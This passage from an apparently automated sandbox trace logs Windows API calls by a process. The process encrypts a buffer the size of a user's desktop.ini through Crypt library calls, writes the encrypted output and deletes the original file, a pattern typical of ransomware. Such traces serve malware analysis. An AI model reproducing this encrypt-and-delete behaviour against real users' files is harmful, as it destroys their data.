lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.593] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e26e0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e26e0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0076.593] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.594] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.594] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.594] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x192, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x1a0) returned 1 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0076.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0076.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0076.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0076.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0076.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0076.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0076.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0076.596] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0076.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0076.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0076.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0076.600] CharLowerBuffW (in: lpsz="byte[417]", cchLength=0x9 | out: lpsz="byte[417]") returned 0x9 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0076.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1a1) returned 0x43e91e0 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x192) returned 0x440b3b8 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0076.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x192) returned 0x440b558 [0076.602] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0076.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cad30 [0076.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.602] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43e91e0*, pdwDataLen=0x144e790*=0x192, dwBufLen=0x1a0 | out: pbData=0x43e91e0*, pdwDataLen=0x144e790*=0x1a0) returned 1 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0076.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0076.602] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.602] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.602] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.603] WriteFile (in: hFile=0x298, lpBuffer=0x43e8d00*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x43e8d00*, lpNumberOfBytesWritten=0x144f194*=0x1a0, lpOverlapped=0x0) returned 1 [0076.604] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.604] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.604] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0076.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0076.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca6d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0076.604] CryptDestroyKey (hKey=0x41ac200) returned 1 [0076.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.605] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.605] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.605] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0076.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0076.606] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0076.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0076.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0076.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.606] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.606] FreeLibrary (hLibModule=0x756e0000) returned 1 [0076.606] CloseHandle (hObject=0x258) returned 1 [0076.606] CloseHandle (hObject=0x298) returned 1 [0076.607] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFilePart=0x0) returned 0x25 [0076.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0076.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0076.607] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini")) returned 0x26 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0076.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a558 [0076.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0076.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a558 | out: hHeap=0x1780000) returned 1 [0076.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0076.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0076.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0076.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0076.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.613] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac540 [0076.613] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini")) returned 1 [0076.614] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0076.614] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0076.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0076.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0076.615] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0076.615] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0076.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 